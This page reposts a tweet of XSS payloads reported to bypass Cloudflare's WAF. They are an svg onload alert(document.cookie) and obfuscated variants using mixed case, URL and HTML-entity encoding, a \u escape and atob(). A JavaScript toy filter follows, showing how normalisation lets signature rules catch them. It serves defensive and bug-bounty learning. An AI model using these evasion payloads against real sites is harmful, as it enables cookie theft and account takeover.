BugHuntingTips shared a set of XSS payloads reported to bypass the Cloudflare WAF. Beyond the plain `<svg onload=alert(document.cookie)>`, the payloads obfuscate the same SVG onload handler with the tricks a signature-based filter commonly misses: mixed-case attribute names, a junk attribute and a `/**/` comment used as attribute separators, URL-encoded `=` and HTML-entity-encoded parentheses, a `\u006e` escape inside the `confirm` identifier, and a string hidden in base64 and recovered with `atob()`. Each encoding layer is undone by the browser before the handler runs, so the payload that reaches the page is the ordinary `confirm()` call. Treat these as point-in-time findings: managed rulesets change, so verify any payload against the current ruleset, and remember that a WAF is a mitigating control, not a substitute for output encoding in the application. Learn more about these payloads and their impact in the blogpost.
BugHuntingTips
SOME OF THE TOP XSS WAF BYPASS PAYLOADS 🙂
Cloudflare WAF:
<svg onload=alert(document.cookie)>
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>
Cloudfront…
— 0xRAYAN (@0xRAYAN7) May 22, 2024
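The following is an added example, not code from the tweet's author or from Cloudflare: a toy signature rule set run against the quoted payloads, first on the raw request string and then after the decoding a WAF has to perform (URL/form decoding, comment stripping, HTML entity and JavaScript `\u` escape decoding, base64 revealed from `atob()`) before the same rules can see the handler. The rule set and the decoding chain are my own illustration of why the obfuscated payload evades a raw-string match, not Cloudflare's actual logic. The payloads are copied from the tweet; in the second one the backslash in `\u006e` and the `x` in `&#x28;` are restored where the page rendered them as `cou006efirm` and `×28`.

```javascript
// Added example for this page (not from the tweet's author or from Cloudflare):
// a naive WAF rule set next to the normalisation needed before the quoted
// payloads become visible to that same rule set. Rules and decoding chain are
// illustrative assumptions, not Cloudflare's logic.

// Payloads quoted from the tweet (second one with the \ and x escapes restored).
const PAYLOADS = [
  '<svg onload=alert(document.cookie)>',
  '<svg/oNLY%3d1/**/On+ONLoaD%3dco\\u006efirm%26%23x28%3b%26%23x29%3b>',
  '<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>',
];

// Signature rules: an svg element with an onload handler, or a call to one of
// the usual proof-of-concept functions.
const RULES = [/<svg[^>]*onload\s*=/i, /\b(alert|confirm|prompt)\s*\(/i];

// Naive filter: rules applied to the raw request string as received.
function naiveMatch(raw) {
  return RULES.some((r) => r.test(raw));
}

// --- Normalisation steps, in the order the browser would undo them ---

// Form/URL decoding: '+' is a space in application/x-www-form-urlencoded and
// %XX sequences become bytes. Malformed input is kept as is rather than
// dropped, so a broken escape cannot be used to abort inspection.
function urlDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s;
  }
}

// A /**/ comment works as an attribute separator where a space is filtered;
// treat it as whitespace.
function stripJsComments(s) {
  return s.replace(/\/\*[\s\S]*?\*\//g, ' ');
}

// Numeric character references inside attribute values are decoded by the
// HTML parser before the handler source reaches the JS engine.
function htmlEntityDecode(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// \uXXXX escapes are legal inside JS identifiers, so co\u006efirm is confirm.
function jsUnicodeDecode(s) {
  return s.replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Expose the argument of atob("...") so a rule can see what the base64 hides.
// (In a real request a '+' inside base64 arrives as %2B, so the form decoding
// above does not corrupt it.)
function base64Reveal(s) {
  return s.replace(/atob\(\s*["']([A-Za-z0-9+\/=]+)["']\s*\)/g,
    (_, b64) => `"${Buffer.from(b64, 'base64').toString('utf8')}"`);
}

// Attackers layer encodings, so decode until the string stops changing, with
// a bound so a pathological input cannot keep the filter busy.
function normalize(raw, maxRounds = 4) {
  let s = raw;
  for (let i = 0; i < maxRounds; i++) {
    const next = base64Reveal(jsUnicodeDecode(htmlEntityDecode(stripJsComments(urlDecode(s)))));
    if (next === s) break;
    s = next;
  }
  return s;
}

// Same rules, applied to the normalised string.
function normalizedMatch(raw) {
  return RULES.some((r) => r.test(normalize(raw)));
}

// Per payload: what the raw-string rules see versus the normalised view.
function analyze(payloads = PAYLOADS) {
  return payloads.map((raw) => ({
    raw,
    normalized: normalize(raw),
    naive: naiveMatch(raw),
    afterNormalize: normalizedMatch(raw),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of analyze()) {
    const tag = (hit) => (hit ? 'CAUGHT' : 'MISSED');
    console.log(`raw: ${tag(r.naive)}  normalised: ${tag(r.afterNormalize)}  ${r.normalized}`);
  }
}
```

Run with `node` to see the three verdicts: the plain payload is caught either way, the encoded one is missed on the raw string and caught only after normalisation (it decodes to `<svg/oNLY=1 On ONLoaD=confirm()>`), and the `atob()` variant is caught by the onload rule even raw, with the base64 string revealed as the harmless message it carries. The bounded decode loop matters: a filter that decodes once is defeated by double encoding, and one that decodes without a bound is a denial-of-service target.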